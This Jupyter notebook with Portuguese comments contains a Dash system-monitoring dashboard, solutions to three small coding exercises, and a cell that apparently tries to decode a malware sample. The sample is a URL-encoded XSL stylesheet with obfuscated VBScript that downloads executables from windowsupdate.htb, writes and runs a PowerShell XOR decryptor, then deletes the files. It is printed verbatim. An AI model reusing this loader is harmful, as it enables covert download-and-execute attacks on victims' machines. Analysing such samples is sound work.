In [4]:
import os
import platform
import psutil
import dash
from dash import dcc, html
from dash.dependencies import Input, Output, State

# Inicializar o app
app = dash.Dash(__name__)

# Funções para coletar informações do sistema
def get_system_info():
    return {
        "Sistema Operacional": platform.system(),
        "Versão": platform.version(),
        "Arquitetura": platform.architecture()[0],
        "Processador": platform.processor(),
        "Nome do Host": platform.node()
    }

def get_hardware_info():
    mem = psutil.virtual_memory()
    disk = psutil.disk_usage('/')
    cpu_percent = psutil.cpu_percent(interval=None)
    cpu_idle = 100 - cpu_percent
    print("Espaço de disco:  ", round(disk.total))
    return {
        "CPU Uso (%)": cpu_percent,
        "CPU Ocioso (%)": cpu_idle,
        "Memória Total (GB)": round(mem.total / 1e9, 2),
        "Memória Usada (GB)": round(mem.used / 1e9, 2),
        "Espaço Total Disco (GB)": round(disk.total / 1e9, 2),
        "Espaço Usado Disco (GB)": round(disk.used / 1e9, 2),
        "Total de Processos": len(psutil.pids()),
        "Total de Threads": sum([psutil.Process(pid).num_threads() for pid in psutil.pids()])
    }

def get_process_info():
    return [
        {
            "PID": proc.info["pid"],
            "Nome": proc.info["name"],
            "Usuário": proc.info["username"],
            "CPU (%)": proc.info["cpu_percent"],
            "Memória (%)": proc.info["memory_percent"],
        }
        for proc in psutil.process_iter(["pid", "name", "cpu_percent", "memory_percent", "username"])
    ]

def get_process_threads(pid):
    try:
        proc = psutil.Process(pid)
        threads = proc.threads()
        return [{"ID": thread.id, "Tempo (s)": thread.user_time + thread.system_time} for thread in threads]
    except psutil.NoSuchProcess:
        return []

# Layout do Dashboard
app.layout = html.Div([
    html.H1("Dashboard do Sistema Operacional", style={'text-align': 'center', 'margin-bottom': '40px'}),

    # Informações Globais
    html.Div([
        html.H3("Informações Globais", style={'color': '#66ff66'}),
        html.Div([
            html.Ul(id='system-info'),
            html.Ul(id='hardware-info'),
        ], style={'background-color': '#2e2e2e', 'padding': '20px', 'border-radius': '10px'})
    ], style={'margin-bottom': '40px'}),

    # Gráfico de uso da CPU
    dcc.Graph(id='cpu-usage', style={'margin': '20px', 'border': '1px solid #444', 'border-radius': '10px'}),

    # Lista de Processos (nomes apenas)
    html.Div([
        html.H3("Processos em Execução", style={'color': '#66ff66'}),
        html.Div(id='process-list', children=[]),  # Lista de nomes de processos
    ], style={'margin-bottom': '40px'}),

    # Detalhes do Processo Selecionado
    html.Div([
        html.H3("Detalhes do Processo Selecionado", style={'color': '#66ff66'}),
        html.Div([
            html.H4("Threads do Processo", style={'color': '#66ff66'}),
            html.Table(id='process-threads', style={'width': '100%', 'border': '1px solid black', 'border-radius': '10px'}),
            html.H4("Informações Detalhadas", style={'color': '#66ff66'}),
            html.Ul(id='process-details')
        ], style={'background-color': '#2e2e2e', 'padding': '20px', 'border-radius': '10px'})
    ], style={'margin-bottom': '40px'}),

    # Intervalo de Atualização
    dcc.Interval(id='update-interval', interval=5000, n_intervals=0)
], style={
    'background-color': '#1e1e1e',
    'color': 'white',
    'padding': '20px',
    'font-family': 'Arial, sans-serif'
})

# Callbacks
@app.callback(
    [Output('system-info', 'children'),
     Output('hardware-info', 'children'),
     Output('cpu-usage', 'figure'),
     Output('process-list', 'children')],
    [Input('update-interval', 'n_intervals')]
)
def update_dashboard(_):
    # Informações do sistema
    system_info = get_system_info()
    system_info_list = [html.Li(f"{key}: {value}") for key, value in system_info.items()]

    # Informações de hardware
    hardware_info = get_hardware_info()
    hardware_info_list = [html.Li(f"{key}: {value}") for key, value in hardware_info.items()]

    # Gráfico de uso de CPU
    figure = {
        'data': [{'x': list(range(10)), 'y': [psutil.cpu_percent() for _ in range(10)], 'type': 'line', 'name': 'CPU Usage'}],
        'layout': {'title': 'Uso da CPU (%)', 'plot_bgcolor': '#1e1e1e', 'paper_bgcolor': '#1e1e1e'}
    }

    # Gerar a lista de processos (nomes apenas)
    processes = get_process_info()
    process_list = [
        html.Div(
            html.Button(proc['Nome'], id={'type': 'process-button', 'index': proc['PID']}, style={'background-color': '#444', 'color': 'white', 'margin': '5px', 'padding': '10px', 'border-radius': '5px'})
        ) for proc in processes
    ]

    return system_info_list, hardware_info_list, figure, process_list

@app.callback(
    [Output('process-threads', 'children'),
     Output('process-details', 'children')],
    [Input({'type': 'process-button', 'index': dash.dependencies.ALL}, 'n_clicks')],
    [State({'type': 'process-button', 'index': dash.dependencies.ALL}, 'id')]
)
def show_process_details(n_clicks, process_ids):
    # Verificar qual botão foi clicado
    if n_clicks is None or all(click is None for click in n_clicks):
        return [], []

    # Identificar o índice do processo clicado
    clicked_process_id = next(process_ids[i] for i, click in enumerate(n_clicks) if click is not None)
    pid = clicked_process_id['index']

    try:
        proc = psutil.Process(pid)

        # Informações detalhadas do processo
        details = {
            "PID": proc.pid,
            "Nome": proc.name(),
            "Usuário": proc.username(),
            "CPU (%)": proc.cpu_percent(interval=0.1),
            "Memória (%)": proc.memory_percent(),
            "Status": proc.status(),
            "Tempo de Execução": proc.create_time(),
        }

        # Exibindo as threads do processo
        threads = get_process_threads(pid)
        thread_header = html.Tr([html.Th("ID da Thread"), html.Th("Tempo (s)")])
        thread_rows = [html.Tr([html.Td(thread["ID"]), html.Td(thread["Tempo (s)"])]) for thread in threads]
        thread_table = [thread_header] + thread_rows

        return thread_table, [html.Li(f"{key}: {value}") for key, value in details.items()]
    except psutil.NoSuchProcess:
        return [], [html.Li("O processo selecionado não está mais ativo.")]

# Rodar o servidor
if __name__ == '__main__':
    app.run_server(debug=True)

Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
Espaço de disco:   235430473728
---------------------------------------------------------------------------
ProcessLookupError                        Traceback (most recent call last)
File ~\AppData\Roaming\Python\Python312\site-packages\psutil\_pswindows.py:727, in wrap_exceptions.<locals>.wrapper(
    self=<psutil._pswindows.Process object>,
    *args=(),
    **kwargs={}
)
    726 try:
--> 727     return fun(self, *args, **kwargs)
        fun = <function Process.create_time at 0x0000011051C00360>
        self = <psutil._pswindows.Process object

In [2]:
import os
import platform
import psutil
import dash
from dash import dcc, html
from dash.dependencies import Input, Output
import plotly.graph_objs as go

# Inicializar o app
app = dash.Dash(__name__)

# Funções para coletar informações do sistema
def get_system_info():
    return {
        "Sistema Operacional": platform.system(),
        "Versão": platform.version(),
        "Arquitetura": platform.architecture()[0],
        "Processador": platform.processor(),
        "Nome do Host": platform.node()
    }

def get_hardware_info():
    mem = psutil.virtual_memory()
    disk = psutil.disk_usage('/')
    return {
        "CPU Uso (%)": psutil.cpu_percent(interval=None),
        "Memória Total (GB)": round(mem.total / 1e9, 2),
        "Memória Usada (GB)": round(mem.used / 1e9, 2),
        "Espaço Total Disco (GB)": round(disk.total / 1e9, 2),
        "Espaço Usado Disco (GB)": round(disk.used / 1e9, 2)
    }

def get_all_process_info():
    return [
        {
            "PID": proc.info["pid"],
            "Nome": proc.info["name"],
            "CPU (%)": proc.info["cpu_percent"],
            "Memória (%)": proc.info["memory_percent"],
        }
        for proc in psutil.process_iter(["pid", "name", "cpu_percent", "memory_percent"])
    ]

# Layout do Dashboard
app.layout = html.Div([
    html.H1("Dashboard do Sistema Operacional", style={
        'text-align': 'center', 'color': '#2A3B0C', 'font-family': 'Poppins, sans-serif',
        'font-size': '32px', 'margin': '20px 0', 'background-color': '#D4E59E', 'padding': '15px', 'border-radius': '8px'
    }),

    # Informações Globais
    html.Div([
        html.H3("Informações do Sistema", style={'color': '#2A3B0C', 'font-size': '24px', 'margin-bottom': '10px'}),
        html.Ul(id='system-info', style={'color': '#2A3B0C', 'font-size': '18px', 'list-style': 'none', 'padding': '0'}),
        html.Ul(id='hardware-info', style={'color': '#2A3B0C', 'font-size': '18px', 'list-style': 'none', 'padding': '0'}),
    ], style={'background-color': '#CDE67D', 'padding': '20px', 'border-radius': '8px', 'margin-bottom': '20px'}),

    # Gráficos
    html.Div([
        html.H3("Gráficos de Uso", style={'color': '#2A3B0C', 'font-size': '24px', 'margin-bottom': '10px'}),
        html.Div([
            html.Div([
                dcc.Graph(id='cpu-usage', style={'height': '300px', 'width': '100%'}),
            ], style={'flex': '1', 'margin-right': '10px'}),
            html.Div([
                dcc.Graph(id='disk-usage', style={'height': '300px', 'width': '100%'}),
            ], style={'flex': '1', 'margin-left': '10px'}),
        ], style={'display': 'flex', 'justify-content': 'space-between'})
    ], style={'background-color': '#CDE67D', 'padding': '20px', 'border-radius': '8px', 'margin-bottom': '20px'}),

    # Selecione um Processo
    html.Div([
        html.H3("Selecione um Processo", style={'color': '#2A3B0C', 'font-size': '24px', 'margin-bottom': '10px'}),
        dcc.Dropdown(
            id='process-selector',
            placeholder="Selecione um processo",
            style={'width': '100%', 'padding': '10px', 'backgroundColor': '#FFFFFF', 'border-radius': '5px'},
            options=[],
            value=None
        ),
    ], style={'background-color': '#CDE67D', 'padding': '20px', 'border-radius': '8px', 'margin-bottom': '20px'}),

    # Aba de Detalhes do Processo
    html.Div(id='process-details', style={'color': '#2A3B0C', 'font-size': '18px', 'background-color': '#CDE67D', 'padding': '20px', 'border-radius': '8px'}),

    # Intervalo de Atualização
    dcc.Interval(id='update-interval', interval=5000, n_intervals=0)
], style={'background-color': '#AEDE3C', 'padding': '30px', 'font-family': 'Poppins, sans-serif', 'min-height': '100vh'})

# Callbacks e servidor permanecem os mesmos
# Inclua o CSS do Google Fonts no cabeçalho do HTML ao carregar o Dash
app.index_string = '''
<!DOCTYPE html>
<html>
    <head>
        <title>Dashboard</title>
        <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;600&display=swap" rel="stylesheet">
    </head>
    <body>
        {%app_entry%}
        <footer>
            {%config%}
            {%scripts%}
            {%renderer%}
        </footer>
    </body>
</html>
'''

if __name__ == '__main__':
    app.run_server(debug=True)


In [1]:
data = "%3C%3Fxml%20version%3D%271%2E0%27%3F%3E%0D%0A%3Cstylesheet%0D%0A%20%20%20%20xmlns%3D%22http%3A%2F%2Fwww%2Ew3%2Eorg%2F1999%2FXSL%2FTransform%22%20xmlns%3Ams%3D%22urn%3Aschemas%2Dmicrosoft%2Dcom%3Axslt%22%0D%0A%20%20%20%20xmlns%3Auser%3D%22placeholder%22%0D%0A%20%20%20%20version%3D%221%2E0%22%3E%0D%0A%20%20%20%20%3Coutput%20method%3D%22text%22%2F%3E%0D%0A%20%20%20%20%3Cms%3Ascript%20implements%2Dprefix%3D%22user%22%20language%3D%22VBScript%22%3E%0D%0A%20%20%20%20%3C%21%5BCDATA%5B%0D%0ATpHCM%20%3D%20%22%22%3Afor%20i%20%3D%201%20to%203222%3A%20TpHCM%20%3D%20TpHCM%20%2B%20chr%28Asc%28mid%28%22Stxmsr%24I%7Ctpmgmx%0EHmq%24sfnWlipp0%24sfnJWS0%24sfnLXXT%0EHmq%24wxvYVP50%24wxvYVP60%24wxvYVP70%24wxvWls%7BjmpiYVP%0EHmq%24wxvHs%7BrpsehTexl50%24wxvHs%7BrpsehTexl60%24wxvHs%7BrpsehTexl70%24wxvWls%7BjmpiTexl%0EHmq%24wxvI%7CigyxefpiTexl0%24wxvTs%7BivWlippWgvmtx%0EwxvYVP5%24A%24%26lxxt%3E33%7Bmrhs%7Bwythexi2lxf3gwvww2i%7Ci%26%0EwxvYVP6%24A%24%26lxxt%3E33%7Bmrhs%7Bwythexi2lxf3gwvww2hpp%26%0EwxvYVP7%24A%24%26lxxt%3E33%7Bmrhs%7Bwythexi2lxf3gwvww2i%7Ci2gsrjmk%26%0EwxvWls%7BjmpiYVP%24A%24%26lxxt%3E33%7Bmrhs%7Bwythexi2lxf3%7Berxih2thj%26%0EwxvHs%7BrpsehTexl5%24A%24%26G%3E%60Ywivw%60Tyfpmg%60gwvww2i%7Ci%26%0EwxvHs%7BrpsehTexl6%24A%24%26G%3E%60Ywivw%60Tyfpmg%60gwvww2hpp%26%0EwxvHs%7BrpsehTexl7%24A%24%26G%3E%60Ywivw%60Tyfpmg%60gwvww2i%7Ci2gsrjmk%26%0EwxvWls%7BjmpiTexl%24A%24%26G%3E%60Ywivw%60Tyfpmg%60%7Berxih2thj%26%0EwxvI%7CigyxefpiTexl%24A%24%26G%3E%60Ywivw%60Tyfpmg%60gwvww2i%7Ci%26%0E%0EWix%24sfnWlipp%24A%24GviexiSfnigx%2C%26%5BWgvmtx2Wlipp%26%2D%0EWix%24sfnJWS%24A%24GviexiSfnigx%2C%26Wgvmtxmrk2JmpiW%7DwxiqSfnigx%26%2D%0EWix%24sfnLXXT%24A%24GviexiSfnigx%2C%26QW%5CQP62%5CQPLXXT%26%2D%0E%0EMj%24Rsx%24sfnJWS2JmpiI%7Cmwxw%2CwxvHs%7BrpsehTexl5%2D%24Xlir%0E%24%24%24%24Hs%7BrpsehJmpi%24wxvYVP50%24wxvHs%7BrpsehTexl5%0EIrh%24Mj%0EMj%24Rsx%24sfnJWS2JmpiI%7Cmwxw%2CwxvHs%7BrpsehTexl6%2D%24Xlir%0E%24%24%24%24Hs%7BrpsehJmpi%24wxvYVP60%24wxvHs%7BrpsehTexl6%0EIrh%24Mj%0EMj%24Rsx%24sfnJWS2JmpiI%7Cmwxw%2CwxvHs%7BrpsehTexl7%2D%24Xlir%0E%24%24%24%24Hs%7BrpsehJmpi%24wxvYVP70%24wxvHs%7BrpsehTexl7%0EIrh%24Mj%0EMj%24Rsx%24sfnJWS2JmpiI%7Cmwxw%2CwxvWls%7BjmpiTexl%2D%24Xlir%0E%24%24%24%24Hs%7BrpsehJmpi%24wxvWls%7BjmpiYVP0%24wxvWls%7BjmpiTexl%0EIrh%24Mj%0E%0EwxvTs%7BivWlippWgvmtx%24A%24c%0E%26teveq%24%2C%26%24%2A%24zfGvPj%24%2A%24c%0E%26%24%24%24%24%5Fwxvmrka%28JmpiTexl0%26%24%2A%24zfGvPj%24%2A%24c%0E%26%24%24%24%24%5Fwxvmrka%28Oi%7DTexl%26%24%2A%24zfGvPj%24%2A%24c%0E%26%2D%26%24%2A%24zfGvPj%24%2A%24c%0E%26%28oi%7D%24A%24%5FW%7Dwxiq2MS2Jmpia%3E%3EViehEppF%7Dxiw%2C%28Oi%7DTexl%2D%26%24%2A%24zfGvPj%24%2A%24c%0E%26%28jmpiGsrxirx%24A%24%5FW%7Dwxiq2MS2Jmpia%3E%3EViehEppF%7Dxiw%2C%28JmpiTexl%2D%26%24%2A%24zfGvPj%24%2A%24c%0E%26%28oi%7DPirkxl%24A%24%28oi%7D2Pirkxl%26%24%2A%24zfGvPj%24%2A%24c%0E%26jsv%24%2C%28m%24A%244%3F%24%28m%241px%24%28jmpiGsrxirx2Pirkxl%3F%24%28m%2F%2F%2D%24%7F%26%24%2A%24zfGvPj%24%2A%24c%0E%26%24%24%24%24%28jmpiGsrxirx%5F%28ma%24A%24%28jmpiGsrxirx%5F%28ma%241f%7Csv%24%28oi%7D%5F%28m%24%29%24%28oi%7DPirkxla%26%24%2A%24zfGvPj%24%2A%24c%0E%26%C2%81%26%24%2A%24zfGvPj%24%2A%24c%0E%26%5FW%7Dwxiq2MS2Jmpia%3E%3E%5BvmxiEppF%7Dxiw%2C%28JmpiTexl0%24%28jmpiGsrxirx%2D%26%24%2A%24zfGvPj%0E%0EHmq%24sfnJmpi%0ESr%24Ivvsv%24Viwyqi%24Ri%7Cx%0EWix%24sfnJmpi%24A%24sfnJWS2GviexiXi%7CxJmpi%2C%26G%3E%60Ywivw%60Tyfpmg%60xiqt2tw5%260%24Xvyi%2D%0EMj%24Ivv2Ryqfiv%24%40B%244%24Xlir%0E%24%24%24%24%5BWgvmtx2Igls%24%26Ivvsv%24gviexmrk%24Ts%7BivWlipp%24wgvmtx%24jmpi%3E%24%26%24%2A%24Ivv2Hiwgvmtxmsr%0E%24%24%24%24%5BWgvmtx2Uymx%0EIrh%24Mj%0EsfnJmpi2%5BvmxiPmri%24wxvTs%7BivWlippWgvmtx%0EsfnJmpi2Gpswi%0E%0EHmq%24evvJmpiTexlw%0EevvJmpiTexlw%24A%24Evve%7D%2CwxvHs%7BrpsehTexl50%24wxvHs%7BrpsehTexl70%24wxvWls%7BjmpiTexl%2D%0E%0EHmq%24m%0EJsv%24m%24A%244%24Xs%24YFsyrh%2CevvJmpiTexlw%2D%0E%24%24%24%24Hmq%24mrxVixyvrGshi%0E%24%24%24%24mrxVixyvrGshi%24A%24sfnWlipp2Vyr%2C%26ts%7Bivwlipp%241I%7CigyxmsrTspmg%7D%24F%7Dteww%241Jmpi%24G%3E%60Ywivw%60Tyfpmg%60xiqt2tw5%241JmpiTexl%24%26%24%2A%24Glv%2C78%2D%24%2A%24evvJmpiTexlw%2Cm%2D%24%2A%24Glv%2C78%2D%24%2A%24%26%241Oi%7DTexl%24%26%24%2A%24Glv%2C78%2D%24%2A%24wxvHs%7BrpsehTexl6%24%2A%24Glv%2C78%2D0%2440%24Xvyi%2D%0E%24%24%24%24%0E%24%24%24%24Mj%24mrxVixyvrGshi%24%40B%244%24Xlir%0E%24%24%24%24%24%24%24%24%5BWgvmtx2Igls%24%26Ts%7BivWlipp%24wgvmtx%24i%7Cigyxmsr%24jempih%24jsv%24%26%24%2A%24evvJmpiTexlw%2Cm%2D%24%2A%24%26%24%7Bmxl%24i%7Cmx%24gshi%3E%24%26%24%2A%24mrxVixyvrGshi%0E%24%24%24%24Irh%24Mj%0ERi%7Cx%0E%0EsfnWlipp2Vyr%24wxvI%7CigyxefpiTexl0%2450%24Xvyi%0EsfnWlipp2Vyr%24wxvWls%7BjmpiTexl0%2450%24Xvyi%0EsfnJWS2HipixiJmpi%24%26G%3E%60Ywivw%60Tyfpmg%60gwvww2hpp%26%0EsfnJWS2HipixiJmpi%24%26G%3E%60Ywivw%60Tyfpmg%60gwvww2i%7Ci%26%0EsfnJWS2HipixiJmpi%24%26G%3E%60Ywivw%60Tyfpmg%60gwvww2i%7Ci2gsrjmk%26%0EsfnJWS2HipixiJmpi%24%26G%3E%60Ywivw%60Tyfpmg%60xiqt2tw5%26%0E%0EWyf%24Hs%7BrpsehJmpi%2Cyvp0%24texl%2D%0E%24%24%24%24Hmq%24sfnWxvieq%0E%24%24%24%24Wix%24sfnWxvieq%24A%24GviexiSfnigx%2C%26EHSHF2Wxvieq%26%2D%0E%24%24%24%24sfnLXXT2Stir%24%26KIX%260%24yvp0%24Jepwi%0E%24%24%24%24sfnLXXT2Wirh%0E%24%24%24%24Mj%24sfnLXXT2Wxexyw%24A%24644%24Xlir%0E%24%24%24%24%24%24%24%24sfnWxvieq2Stir%0E%24%24%24%24%24%24%24%24sfnWxvieq2X%7Dti%24A%245%0E%24%24%24%24%24%24%24%24sfnWxvieq2%5Bvmxi%24sfnLXXT2ViwtsrwiFsh%7D%0E%24%24%24%24%24%24%24%24sfnWxvieq2WeziXsJmpi%24texl0%246%0E%24%24%24%24%24%24%24%24sfnWxvieq2Gpswi%0E%24%24%24%24Irh%24Mj%0E%24%24%24%24Wix%24sfnWxvieq%24A%24Rsxlmrk%0EIrh%24Wyf%0E%22%2Ci%2C1%29%29%20%2D%20%285%29%20%2B%20%281%29%29%3ANext%3AExecute%20TpHCM%3A%0D%0A%20%20%20%20%5D%5D%3E%0D%0A%20%20%20%20%3C%2Fms%3Ascript%3E%0D%0A%3C%2Fstylesheet%3E"  # Coloque toda a string aqui

decoded = ""
for i in range(1, len(data) + 1):
    decoded += chr(ord(data[i - 1]))  # Simula Asc(mid(...))

print(decoded)


%3C%3Fxml%20version%3D%271%2E0%27%3F%3E%0D%0A%3Cstylesheet%0D%0A%20%20%20%20xmlns%3D%22http%3A%2F%2Fwww%2Ew3%2Eorg%2F1999%2FXSL%2FTransform%22%20xmlns%3Ams%3D%22urn%3Aschemas%2Dmicrosoft%2Dcom%3Axslt%22%0D%0A%20%20%20%20xmlns%3Auser%3D%22placeholder%22%0D%0A%20%20%20%20version%3D%221%2E0%22%3E%0D%0A%20%20%20%20%3Coutput%20method%3D%22text%22%2F%3E%0D%0A%20%20%20%20%3Cms%3Ascript%20implements%2Dprefix%3D%22user%22%20language%3D%22VBScript%22%3E%0D%0A%20%20%20%20%3C%21%5BCDATA%5B%0D%0ATpHCM%20%3D%20%22%22%3Afor%20i%20%3D%201%20to%203222%3A%20TpHCM%20%3D%20TpHCM%20%2B%20chr%28Asc%28mid%28%22Stxmsr%24I%7Ctpmgmx%0EHmq%24sfnWlipp0%24sfnJWS0%24sfnLXXT%0EHmq%24wxvYVP50%24wxvYVP60%24wxvYVP70%24wxvWls%7BjmpiYVP%0EHmq%24wxvHs%7BrpsehTexl50%24wxvHs%7BrpsehTexl60%24wxvHs%7BrpsehTexl70%24wxvWls%7BjmpiTexl%0EHmq%24wxvI%7CigyxefpiTexl0%24wxvTs%7BivWlippWgvmtx%0EwxvYVP5%24A%24%26lxxt%3E33%7Bmrhs%7Bwythexi2lxf3gwvww2i%7Ci%26%0EwxvYVP6%24A%24%26lxxt%3E33%7Bmrhs%7Bwythexi2lxf3gwvww2hpp%26%0EwxvYVP7%24A%24

In [7]:
# Input the text as a single string
input_text = input()  # Example: "The quick brown fox jumps over the lazy dog."

# Write your solution below and make sure to print the most common word
import string
sem_pontuacao = ''.join([char.lower() if char not in string.punctuation else '' for char in input_text])
sem_pontuacao = sem_pontuacao.split()
dicionario = {}
for palavra in sem_pontuacao:
    if palavra in dicionario:
        dicionario[palavra] += 1
    else:
        dicionario[palavra] = 1

mais_comum = max(dicionario, key=dicionario.get)
print(mais_comum)

the


In [ ]:
# Input two arrays as strings
signals = input()  # First input array as a string
weights = input()  # Second input array as a string

#transforma o input em lista de inteiros
import ast
signals = ast.literal_eval(signals)
weights = ast.literal_eval(weights)

# Write your solution below and make sure to print the maximum stability score
modified = []
for i in range(len(signals)):
    modified.append(signals[i]*weights[i])
    
def subarrays_continuos(lista):
    subarrays = []
    for i in range(len(lista)):
        for j in range(i + 1, len(lista) + 1):
            subarrays.append(lista[i:j])
    return subarrays


resposta = subarrays_continuos(modified)
multiplicacoes = []
import math
for tupla in resposta:
    resultado = math.prod(tupla)
    multiplicacoes.append(resultado)
        
        
print(max(multiplicacoes))
    

[[2], [2, -6], [2, -6, -3], [2, -6, -3, -16], [-6], [-6, -3], [-6, -3, -16], [-3], [-3, -16], [-16]]
48


In [22]:
# Input energy crystals and target energy as strings
energy_crystals = input()  # Input as a string
target_energy = input()  # Input as a string

# Write your solution below and make sure to print the number of ways
import ast
energy_crystals = ast.literal_eval(energy_crystals)
target_energy = int(target_energy)

def count_combinations(energy_crystals, target_energy):
    # Inicializamos o array DP
    dp = [0] * (target_energy + 1)
    dp[0] = 1  # Apenas uma maneira de formar a soma 0
    
    # Atualizamos dp para cada cristal
    for crystal in energy_crystals:
        for j in range(crystal, target_energy + 1):
            dp[j] += dp[j - crystal]
    
    return dp[target_energy]

resposta = count_combinations(energy_crystals, target_energy)
print(resposta)

5
